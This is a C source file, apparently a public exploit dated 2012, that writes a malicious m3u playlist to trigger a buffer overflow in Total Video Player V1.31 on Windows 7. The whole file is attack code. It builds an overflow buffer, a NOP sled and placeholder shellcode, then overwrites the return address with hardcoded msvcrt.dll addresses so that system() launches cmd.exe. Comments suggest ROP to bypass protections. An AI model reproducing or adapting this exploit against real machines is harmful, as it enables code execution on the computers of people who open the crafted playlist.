/* 28-08-2012 Total Video Player V1.31 m3u playlist exploit Local Exploit Written by GoTr00t Tested on Windows 7 aksuumit[at]hotmail.com */ #include <stdio.h> #include <string.h> #include <stdlib.h> int main() { char exploit[3000]; memset(exploit,0x00,sizeof(exploit)); char overflow[304]; memset(overflow,0x41,sizeof(overflow)-1); char nops[40]; memset(nops,0x90,sizeof(nops)); char shellcode[160]; memset(shellcode,0x55,sizeof(shellcode)); char HEADER[] = "#EXTM3U\n#EXTINF:,\n"; // 7694B177 address of system in the msvcrt.dll char newEIP[] = "\x77\xB1\x94\x76"; strcpy(exploit,HEADER); strcat(exploit,"c:\\"); strcat(exploit,overflow); strcat(exploit,nops); strcat(exploit,shellcode); // fake shellcode because there are multiple ways to exploit this vulnerability you can place a shellcode here strcat(exploit,newEIP); // and use this EIP to jump to the shellcode but for this example i use a return2dll technique strcat(exploit,"\x44\x44\x44\x44"); // junk or you can use this one to jump to another dll to execute so you can do a ROP to bypass protection // 7638BF27 cmd.exe strcat(exploit,"\x27\xBF\x38\x76"); // Write a exploit playlist FILE *fp = fopen("exploit.m3u","w"); fprintf(fp,exploit); fclose(fp); printf("Exploit written!\n"); return 0; }